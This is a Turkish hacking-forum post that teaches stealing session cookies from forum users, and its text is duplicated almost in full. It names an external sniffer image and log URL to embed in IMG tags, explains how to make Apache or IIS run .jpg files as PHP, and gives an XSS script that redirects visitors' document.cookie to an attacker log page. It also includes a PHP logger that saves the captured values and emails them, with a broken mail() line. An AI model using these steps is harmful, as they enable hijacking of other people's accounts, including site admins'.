red_devil_624
New member
Cookiler web sayfanızı ziyaret eden ziyaretçilere sonraki girişlerinde tanımak için bırakılan metin dosyalarıdır.Bu dosyalardaki bilgiler XSS saldırıları ile çalınabilinir ve o siteye sizin kullanıcı adınız ile cookie sayesinde oturum açabilirler.
Bazı portal ve forumlarda forumda
kodu kullanılarakta cookie çalınabilmektedir.
Foruma mesaj atarken IMG tag ı içine http://antichat.ru/cgi-bin/s.jpg bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi http://antichat.ru/sniff/log.php adresinde loglanıcaktır.
Peki gelelim http://antichat.ru/cgi-bin/s.jpg nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.
Serverınızda apache veya IIS kurulu ise yapmanız gerekenler
Apache için
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
IIS de bu işlemi
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.
Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine
<script>document.location=http://www.site.com/log.php?+escape(document.cookie)</script> yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye
bu bbcode arasında çağırmak
Log.php kodları:
<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail(" [email protected],Şifre Geldi çip çip ",": [email protected]);
Bazı portal ve forumlarda forumda
Foruma mesaj atarken IMG tag ı içine http://antichat.ru/cgi-bin/s.jpg bu resmi çağırırsanız o konuya giren herkesin cookie bilgisi http://antichat.ru/sniff/log.php adresinde loglanıcaktır.
Peki gelelim http://antichat.ru/cgi-bin/s.jpg nin nasıl cookie çaldığına burda jpg içine kod filan ekledikleri yok.Yapılan çok basit birşey tabi bunu daha önce apache server veya IIS kurduysanız anlarsınız.
Serverınızda apache veya IIS kurulu ise yapmanız gerekenler
Apache için
Apache kurduğunuz klasore girip ordan conf klasorune httpd isimli dosyayı açıp AddType application/x-httpd-php3 .phtml .php3 .php satırını bularak sonuna .jpg eklemek.Burada php yi temsil edecek uzantıları seçiyorsunuz ve .jpg uzantısınıda php emrine vermiş oluyorsunuz
IIS de bu işlemi
Başlat/çalıştır/regedit e girerek HKEY_LOCAL_MACHINE/System/CurrentControlSet/Services/W3SVC/Parameters/ScriptMap bölümüne girip düzen menüsünden yeni dize değerine tıklayın daha sonra yeni değer e çift tıklayıp .jpg yazın işte IIS de de jpg uzantıyı php emrine vermiş olduk.
Daha sonra yapmanız gerekenler Yeni bir metin belgesi açıp içine
<script>document.location=http://www.site.com/log.php?+escape(document.cookie)</script> yazarak atıyorum turfan.jpg olarak farklı kaydetmek ondan sonra bun dosyayı jpg uzantısını php nin emrine verdiğiniz server daki bir siteye atıp admin cookie çalmak istediğiniz siteye
Log.php kodları:
<?php
$kayit = fopen("ekledik.txt","a");
foreach($_GET as $variable => $value) {
fwrite($kayit,$variable . ": " . $value . "\n");
}
fwrite($kayit,"---------------------------\n");
fclose($kayit);
mail(" [email protected],Şifre Geldi çip çip ",": [email protected]);